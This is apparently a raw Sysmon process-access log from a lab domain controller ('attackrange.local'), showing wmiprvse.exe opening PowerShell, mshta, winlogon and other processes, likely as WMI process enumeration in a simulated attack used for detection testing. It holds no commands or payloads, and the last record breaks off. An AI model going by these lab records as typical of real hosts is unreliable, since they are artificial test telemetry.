10341000x800000000000000022766Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2106-00000000A301}5664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022765Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022764Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022763Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022762Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022761Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022760Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022759Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022758Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022757Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022756Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022755Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022754Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022753Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022752Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022751Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022750Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022749Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022748Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022747Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022746Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 